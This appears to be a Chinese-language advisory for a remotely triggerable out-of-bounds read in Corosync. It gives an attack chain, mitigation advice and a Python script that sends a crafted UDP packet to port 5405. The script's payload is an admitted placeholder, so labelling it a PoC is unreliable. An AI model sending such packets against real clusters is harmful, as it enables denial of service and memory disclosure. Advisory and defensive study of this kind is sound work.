CVE-2026-35091 Corosync越界读取导致拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-35091

漏洞类型

越界读取

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Corosync

漏洞概述

Corosync集群引擎中存在一处严重的安全漏洞。该漏洞源于成员资格提交令牌的完整性检查逻辑中存在错误的返回值处理。远程未经身份认证的攻击者可以通过发送特制的用户数据报协议（UDP）数据包来触发此漏洞。成功利用可能导致越界读取，进而造成服务拒绝，并存在泄露敏感内存信息的风险。

技术细节

该漏洞的技术核心在于Corosync对成员资格提交令牌进行完整性检查时，未能正确处理特定函数的返回值。攻击者利用这一逻辑缺陷，构造并发送特制的UDP数据包，导致程序在解析过程中完全绕过边界检查机制。由于未对输入数据包长度进行严格验证，后续的内存读取操作访问了超出合法缓冲区范围的地址，即发生了典型的越界读取错误。这种行为不仅破坏了程序的正常执行流程，直接导致服务进程崩溃，从而引发拒绝服务攻击，还可能因读取了相邻内存区域的数据而泄露敏感信息。鉴于该漏洞无需用户交互且无需认证，攻击门槛较低，对依赖Corosync的高可用集群环境构成了严重的安全威胁。

攻击链分析

STEP 1

侦察

扫描网络以识别运行Corosync服务的主机，通常开放UDP 5405端口。

STEP 2

构造载荷

攻击者编写脚本，生成能够绕过完整性检查的特制UDP数据包。

STEP 3

发送数据包

将恶意UDP数据包发送至目标主机的Corosync服务端口。

STEP 4

触发漏洞

目标系统解析数据包时，因错误的返回值处理导致越界读取。

STEP 5

产生影响

导致Corosync进程崩溃（DoS）或泄露部分内存内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Proof of Concept for CVE-2026-35091
# This script sends a crafted UDP packet to trigger the out-of-bounds read.
# Target: Corosync (Default port 5405)

def send_exploit_packet(target_ip, target_port=5405):
    try:
        # Create a UDP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        
        # Crafted payload to trigger the vulnerability
        # Note: Actual specific bytes to trigger the specific return value flaw 
        # would require reverse engineering the binary or detailed analysis.
        # This represents a malformed token structure.
        payload = b"\x00\x00\x00\x01" + b"\x41" * 256 
        
        sock.sendto(payload, (target_ip, target_port))
        print(f"[*] Packet sent to {target_ip}:{target_port}")
        sock.close()
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        send_exploit_packet(sys.argv[1])

影响范围

Corosync (具体受影响版本请参考Red Hat安全公告 RHSA-2026:13644, RHSA-2026:13657等)

防御指南

临时缓解措施

在应用补丁之前，建议通过防火墙规则严格限制对Corosync端口（默认为UDP 5405）的访问，确保仅集群内部节点之间可以通信，阻断外部未认证的攻击来源。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35091
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35091
3 Details https://www.cvedetails.com/cve/CVE-2026-35091/
4 VulDB https://vuldb.com/cve/CVE-2026-35091
5 Link https://access.redhat.com/errata/RHSA-2026:13644
6 Link https://access.redhat.com/errata/RHSA-2026:13657
7 Link https://access.redhat.com/errata/RHSA-2026:13673
8 Link https://access.redhat.com/errata/RHSA-2026:14205
9 Link https://access.redhat.com/errata/RHSA-2026:14210
10 Link https://access.redhat.com/errata/RHSA-2026:14211
11 Link https://access.redhat.com/errata/RHSA-2026:14212
12 Link https://access.redhat.com/errata/RHSA-2026:14213
13 Link https://access.redhat.com/errata/RHSA-2026:14214
14 Link https://access.redhat.com/errata/RHSA-2026:14215